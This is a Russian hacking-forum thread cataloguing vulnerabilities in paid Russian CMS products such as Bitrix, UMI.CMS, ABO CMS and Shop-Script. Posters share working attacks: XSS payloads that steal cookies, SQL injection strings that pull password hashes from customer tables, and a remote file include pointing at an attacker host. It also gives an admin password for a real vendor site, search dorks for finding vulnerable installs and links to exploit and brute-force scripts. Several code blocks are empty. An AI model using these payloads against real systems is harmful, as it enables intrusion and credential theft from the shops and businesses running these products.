![]() |
Обзор уязвимостей в платных Cms
VistaCMS
Оф.сайт: http://www.vistacms.ru Стоимость (в руб.): 13000-42000 o.O ------------------------------------------------ Раскрытие путей: http://www.vistacms.ru/modules/kerne'l/ Код:
/usr/home/admin/domains/vistacms.ru/public_html/class/page.class.phpАдминистраторская панель: Код:
http://www.vistacms.ru/admin/Пароль: antichat.ru Клиенты: Код:
http://www.vistacms.ru/clients/P.S. Уязвимость в авторизации, была замечена не везде. С чем это связано не знаю, про версию CMS ничего не говориться. |
UMI.CMS
Оф.сайт: www.umi-cms.ru Стоимость (в руб.): 2990-29990 ------------------------------------------ XSS(Активная) Настройки -> Уязвимые поля: Фамилия Имя Отчество Код:
<script>alert(document.cookie)</script> |
Abo Cms
Уязвимость (sql-inj) обнаружена мной в ?модуле статистики? движка ABO CMS, файл c.php находится обычно в корне веб-директории сайта, реально заюзать уязвимость можно в MySQL 4.1 и выше, так как в более ранних версиях нет возможности использовать подзапросы...
цена ABO CMS на офф. сайте достигает 30000 рублей. На этом движке работают крупные инет-магазины, банки, и т.д. вот сплоит ТУТ написанный на php для получения логина и хеша пароля первого пользователя... для получения других данных скрипт не сложно модифицировать... Скрипт написан немного корявенько, т.к. писался на скорую руку, так что больно не бейте |
S.Builder
Разработчик CMS CBS-Group Номер версии S.Builder 3.756 Лицензия платная Сайт www.sbuilder.ru Демо-версия www.demo.sbuilder.ru Функциональность портал Стоимость (в руб.) от 2235 до 44700 руб. для теста в вебе создают акк на сутки SQL-injection 20 полей Цитата:
Цитата:
5.0.22- log::dmsb_d7494517@localhost::dmsb_d7494517 Цитата:
Цитата:
|
VDNH
Оф. сайт http://www.vdnh.ru/ Лицензия - платная Стоимость- от 6750- 176625 уязвимость - xss активная, пассивная <script>alert('helloworld')</script> также бажные у них гостевые книги. |
Уязвимости в Bitrix CMS
Multiple Vulns in Bitrix CMS
Версия системы и история обновления Vulnerable: Bitrix Site Manager 4.1.x Exploit: Код:
http://www.bitrix.ru/bitrix/updates/updater.logУязвимость присутствует из-за редиректа в форме авторизации во время POST- запроса. Атакующий может подменить значение скрытого поля back_url и перенаправить жертву на вредоносную страницу. Раскрытие пути Vulnerable: Bitrix Site Manager 4.0.x Exploit: Код:
http://host/bitrix/templates/.default/subscribe/subscr_form.php Vulnerable: Bitrix Site Manager 4.0.x Exploit: Код:
http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/ |
Amiro.CMS
сайт: amiro.ru XSS (passive) Сплоентс: Код:
/saleoffset=saleoffset=<script>alert(document.cookie)</script>Код:
/blabla<script>alert(document.cookie)</script> |
Mix Systems
vendor:http://mixsystems.com.ua price "МИКС-ВИЗИТКА от 500 у. е." -- "МИКС-ПОРТАЛ от 5000 у. е." SQL injection plugin:katalog EX Код:
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'Код:
version::user::databaseEx Код:
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'&cat=11Код:
version::user::database(c) halkfild написал сплоит на CURL /*быстрее чем сокеты*/ PHP код:
|
ExpiCMS
www.expi-cms.ru стоимость 1. Лицензия 1 год - 6 900 руб. 2. Лицензия 3 года - 12 900 руб. 3. Неограниченная лицензия - 17 490 руб Пассивная xss вход в админку www.expi-cms.ru/cms/login.php в логин и пароль вставляеем например такую конструкцию :) </SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script> Цитата:
|
SQL inj в Shop-Script
Shop-Script
Разработчик Articus dev. group Лицензия платная Сайт www.shop-script.ru/ Демо-версия www.demo.shop-script.ru/premium Функциональность e-магазин Стоимость (в руб.) от 0 до 5450 руб. SQL injection уязвимый скрипт invoice_phys.php уязвимый парамерт order_time= данные передаются кодированные в base64; возможен только посимвольный перебор Пример уязвимого куска кода: PHP код:
Код:
2008-03-16 14:24:11" or 1=1/*Код:
2008-03-16 14:24:11" or orderID=1 and ascii(substring((select cust_password from SS_customers where customerID=1),1,1))=97/*Для удачного перебора нужно знать № существующего заказа в базе. Пароль в базе лежит перекодированный в base64, так что в открытом виде Поиск: __http://search.icq.com/search/results.php?q=inurl%3A%22index.php%3Ffeedback%3Dye s%22 Приблизительно 1500 стр... Рабочий скрипт для подбора пароля __http://rapidshare.com/files/100018966/SS_brute.rar.html Уязвимость не где не вылаживал, античат первый)) |
| Время: 21:00 |